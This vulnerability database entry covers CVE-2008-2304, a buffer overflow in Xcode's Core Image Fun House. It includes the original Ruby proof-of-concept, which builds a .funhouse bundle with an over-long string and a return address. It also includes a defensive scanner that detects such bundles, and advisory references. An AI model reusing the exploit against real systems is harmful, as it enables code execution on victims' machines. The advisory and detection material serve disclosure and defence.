Apple Xcode Tools .funhouse File XML Data Handling Buffer Overflow Vulnerability

Vulnerability ID: 1115661    Type: Buffer overflow
Published: 2008-07-11    Updated: 2008-07-14
CVE ID: CVE-2008-2304    CNNVD ID: CNNVD-200807-216
Platform: OSX    CVSS score: 6.8
|Sources
https://www.exploit-db.com/exploits/6043
https://www.securityfocus.com/bid/30189
https://cxsecurity.com/issue/WLB-2008070087
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200807-216
|Vulnerability Details
Xcode is the development toolset used on Apple machines. The Xcode tools ship with a sample application named Core Image Fun House, which handles documents with the .funhouse extension. A .funhouse document is a directory bundle whose file.xml is a property list describing the image layers and Core Image filters to apply. Fun House does not correctly validate the XML data it reads from that property list: an over-long string value in a layer entry (the PoC below uses the "file" key of an image layer) overflows a fixed-size buffer. If a user is tricked into opening a specially crafted .funhouse bundle, the overflow can be triggered and, per the Netragard advisory, lead to arbitrary code execution.
|Exploit (PoC)
#!/usr/bin/ruby
# Copyright (c) Netragard, LLC. adriel@netragard.com
#
# /Developer/Applications/Graphics Tools/Core Image Fun House.app
# /Contents/MacOS/Core Image Fun House
#
# (gdb) x/10s 0xbfffddf7
# 0xbfffddf7:      'Z' <repeats 101 times>, "DCBA center"
#
# 2007-07-10 21:15:34.573 Core Image Fun House[1061] CFLog (0):
#        CFPropertyListCreateFromXMLData(): plist parse failed;
#        the data is not proper UTF-8. The file name for this data
#        could be:
#
#        /Users/test/Desktop/SuperTastey.funhouse/file.xml
#        The parser will retry as in 10.2, but the problem should be
#         corrected in the plist.
#
#  \x80-\xFF range that do not form proper utf8

len = 300             # filler bytes placed in the layer's "file" string before the return address
fname = "SuperTastey"
retaddr = 0x0d0d0d0d  # There are lots of filtered chars! (bytes 0x80-0xFF break the plist parse, see above)

# Start from a clean bundle: a .funhouse document is a directory containing file.xml.
if File.exist?(fname + ".funhouse/file.xml")
    File.unlink(fname + ".funhouse/file.xml")
    Dir.rmdir(fname + ".funhouse")
end
Dir.mkdir(fname + ".funhouse") unless Dir.exist?(fname + ".funhouse")

FUNSTUFF =
"<?xml version=\"1.0\" encoding=\"UTF-8\"?>" +
"<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">" +
"<plist version=\"1.0\">" +
"<dict>" +
"<key>layers</key>" +
"<array>" +
"<dict>" +
"<key>file</key>" +
"<string>" +
"Z" * len + [retaddr].pack("V") +
"</string>" +
"<key>offsetX</key>" +
"<real>0.0</real>" +
"<key>offsetY</key>" +
"<real>0.0</real>" +
"<key>type</key>" +
"<string>image</string>" +
"</dict>" +
"<dict>" +
"<key>classname</key>" +
"<string>CIGlassDistortion</string>" +
"<key>type</key>" +
"<string>filter</string>" +
"<key>values</key>" +
"<dict>" +
"<key>inputCenter_CIVectorValue</key>" +
"<string>[150 150]</string>" +
"<key>inputScale</key>" +
"<real>200</real>" +
"<key>inputTexture</key>" +
"<string>" +
"Z" * 50000 +
"</string>" +
"</dict>" +
"</dict>" +
"</array>" +
"</dict>" +
"</plist>" + "\n"

# Write the crafted property list into the bundle; the block form closes the file automatically.
File.open(fname + ".funhouse/file.xml", "w+") { |f|
  f.print(FUNSTUFF)  # weeeeee... lets have fun.
}

# milw0rm.com [2008-07-11]
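The PoC above relies on two things a defender can look for in a .funhouse bundle before anyone opens it: an over-long string under a layer's "file" key (300 bytes plus a 4-byte return address in the PoC) and a very large filter parameter (the 50000-byte inputTexture). The following triage script is an added example written for this page; it is not part of the Netragard exploit or of Apple's code. It does not reproduce the overflow. The thresholds MAX_FILE_LEN and MAX_VALUE_LEN are assumptions chosen for triage, not limits taken from Fun House, and the regex walk over <key>/<string> pairs is a deliberate simplification so that the malformed output of the PoC is still inspected rather than rejected outright by a strict XML parser. The two sample documents at the bottom are constructed here for the usage example and the check.

```ruby
#!/usr/bin/ruby
# Added triage check for .funhouse bundles (example code for this page, not the
# original PoC). Flags the over-long and non-UTF-8 string values the exploit above
# depends on, without triggering the overflow.

MAX_FILE_LEN  = 255    # assumption: a legitimate layer path is well under this
MAX_VALUE_LEN = 4096   # assumption: no filter parameter needs more text than this
CONTROL_BYTES = /[\x00-\x08\x0b-\x1f]/   # control bytes (other than \t and \n) no real path contains

# Returns [key, value] pairs for every <key>..</key><string>..</string> pair in the
# property list. Regex-based on purpose: the PoC's file.xml contains raw control bytes
# that a strict XML parser may refuse, and we still want to see what is in it.
def plist_string_pairs(xml)
  xml.scan(%r{<key>([^<]+)</key>\s*<string>(.*?)</string>}m)
end

# Returns a list of human-readable findings; an empty list means nothing suspicious.
def funhouse_findings(xml)
  findings = []
  plist_string_pairs(xml).each do |key, value|
    bytes = value.b
    if key == "file" && bytes.bytesize > MAX_FILE_LEN
      findings << "file value is #{bytes.bytesize} bytes (limit #{MAX_FILE_LEN})"
    end
    if bytes.bytesize > MAX_VALUE_LEN
      findings << "#{key} value is #{bytes.bytesize} bytes (limit #{MAX_VALUE_LEN})"
    end
    unless bytes.dup.force_encoding("UTF-8").valid_encoding?
      findings << "#{key} value is not valid UTF-8"
    end
    if bytes =~ CONTROL_BYTES
      findings << "#{key} value contains control bytes"
    end
  end
  findings
end

# Scans a bundle directory on disk, e.g. SuperTastey.funhouse produced by the PoC.
def scan_funhouse_bundle(dir)
  path = File.join(dir, "file.xml")
  return ["#{path}: missing"] unless File.file?(path)
  funhouse_findings(File.binread(path))
end

# Constructed samples for demonstration (not files from the advisory).
BENIGN_XML = <<~XML
  <plist version="1.0"><dict><key>layers</key><array>
  <dict><key>file</key><string>/Users/test/Pictures/cat.jpg</string>
  <key>type</key><string>image</string></dict>
  </array></dict></plist>
XML

# Mirrors the shape of the PoC payload: 300 filler bytes plus a packed return address in
# the "file" string, and a 50000-byte inputTexture in the filter layer.
CRAFTED_XML =
  "<plist version=\"1.0\"><dict><key>layers</key><array>" +
  "<dict><key>file</key><string>" + "Z" * 300 + [0x0d0d0d0d].pack("V") + "</string>" +
  "<key>type</key><string>image</string></dict>" +
  "<dict><key>classname</key><string>CIGlassDistortion</string>" +
  "<key>type</key><string>filter</string><key>values</key><dict>" +
  "<key>inputTexture</key><string>" + "Z" * 50000 + "</string>" +
  "</dict></dict></array></dict></plist>"

if __FILE__ == $0
  ARGV.each { |dir| scan_funhouse_bundle(dir).each { |finding| puts "#{dir}: #{finding}" } }
end
```

Run it as `ruby funhouse_scan.rb SuperTastey.funhouse` against the bundle the PoC writes; the benign sample produces no findings, while the crafted one reports the over-long "file" value, the control bytes of the packed return address inside it, and the oversized inputTexture.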
|Affected Products
Apple Xcode 2.4.1, Apple Xcode 2.3, Apple Xcode 2.2, Apple Xcode 2.1, Apple Xcode 2.0, Apple Core Image Fun House 0
|References

Source: XF
Name: apple-xcode-funhouse-bo(43733)
Link: http://xforce.iss.net/xforce/xfdb/43733
Source: SECTRACK
Name: 1020472
Link: http://www.securitytracker.com/id?1020472
Source: BID
Name: 30189
Link: http://www.securityfocus.com/bid/30189
Source: BUGTRAQ
Name: 20080711 [NETRAGARD SECURITY ADVISORY][Apple Core Image Fun House <= 2.0 OSX -- Arbitrary Code Execution][NETRAGARD-20080711]
Link: http://www.securityfocus.com/archive/1/archive/1/494230/100/0/threaded
Source: MILW0RM
Name: 6043
Link: http://www.milw0rm.com/exploits/6043
Source: VUPEN
Name: ADV-2008-2093
Link: http://www.frsirt.com/english/advisories/2008/2093/references
Source: support.apple.com
Link: http://support.apple.com/kb/HT2352
Source: SREASON
Name: 3988
Link: http://securityreason.com/securityalert/3988
Source: SECUNIA
Name: 31060
Link: http://secunia.com/advisories/31060
Source: APPLE
Name: APPLE-SA-2008-07-11
Link: http://lists.apple.com/archives/security-announce//2008/Jul/msg00002.html